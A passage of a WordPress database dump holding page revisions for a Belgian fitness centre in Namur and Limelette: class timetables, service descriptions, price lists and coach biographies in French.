href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:55:15', '2013-10-05 08:55:15', '', 11, 'http://www.crosstrainingcenter.be/11-revision-125/', 0, 'revision', '', 0),
(356, 1, '2013-10-05 08:55:37', '2013-10-05 08:55:37', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>11h</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n\r\n<span style=\"text-decoration: underline; background:#F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background:#E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background:#A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background:#A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:55:37', '2013-10-05 08:55:37', '', 11, 'http://www.crosstrainingcenter.be/11-revision-126/', 0, 'revision', '', 0),
(362, 1, '2013-11-04 17:20:34', '2013-11-04 17:20:34', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"tglfe\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-04 17:20:34', '2013-11-04 17:20:34', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(363, 1, '2013-11-04 17:21:08', '2013-11-04 17:21:08', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png\"><img class=\"alignnone size-full wp-image-494\" alt=\"nouvelles seances CT\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png\" width=\"900\" height=\"635\" /></a>\r\n\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'publish', 'closed', 'open', '', 'les-seances-namur', '', '', '2015-09-02 17:07:48', '2015-09-02 17:07:48', '', 0, 'http://www.crosstrainingcenter.be/?page_id=363', 0, 'page', '', 0),
(493, 3, '2015-09-02 16:58:59', '2015-09-02 16:58:59', '<p style=\"text-align: center;\"><img class=\" wp-image-491 aligncenter\" alt=\"Capture d’écran 2015-09-02 à 18.56.23\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/Capture-d’écran-2015-09-02-à-18.56.23-300x211.png\" width=\"900\" height=\"633\" /></p>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2015-09-02 16:58:59', '2015-09-02 16:58:59', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(496, 3, '2015-09-02 17:06:42', '2015-09-02 17:06:42', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png\"><img class=\"alignnone size-full wp-image-494\" alt=\"nouvelles seances CT\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png\" width=\"900\" height=\"635\" /></a>\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2015-09-02 17:06:42', '2015-09-02 17:06:42', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(364, 1, '2013-11-04 17:21:08', '2013-11-04 17:21:08', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2013-11-04 17:21:08', '2013-11-04 17:21:08', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(365, 1, '2015-04-21 08:49:04', '2015-04-21 08:49:04', '<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"sousmenu\">\n<div align=\"center\">\n\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\n\n</div>\n</div></td>\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"sousmenu\">\n<div align=\"center\">\n\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\n\n</div>\n</div></td>\n</tr>\n</tbody>\n</table>\n<h1></h1>\n<h1></h1>\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\n<img class=\"size-full wp-image-446 aligncenter\" alt=\"map\" src=\"http://www.crosstrainingcenter.be/map.png\" usemap=\"#imagemap\" width=\"300\" height=\"236\" />\n\n<map id=\"Map\" name=\"imagemap\"> <area coords=\"90,84,166,108\" shape=\"namur\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\" /> <area coords=\"174,121,233,132\" shape=\"limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\" /> </map>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-autosave-v1', '', '', '2015-04-21 08:49:04', '2015-04-21 08:49:04', '', 11, 'http://www.crosstrainingcenter.be/11-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(367, 1, '2013-11-04 17:24:23', '2013-11-04 17:24:23', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Formateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 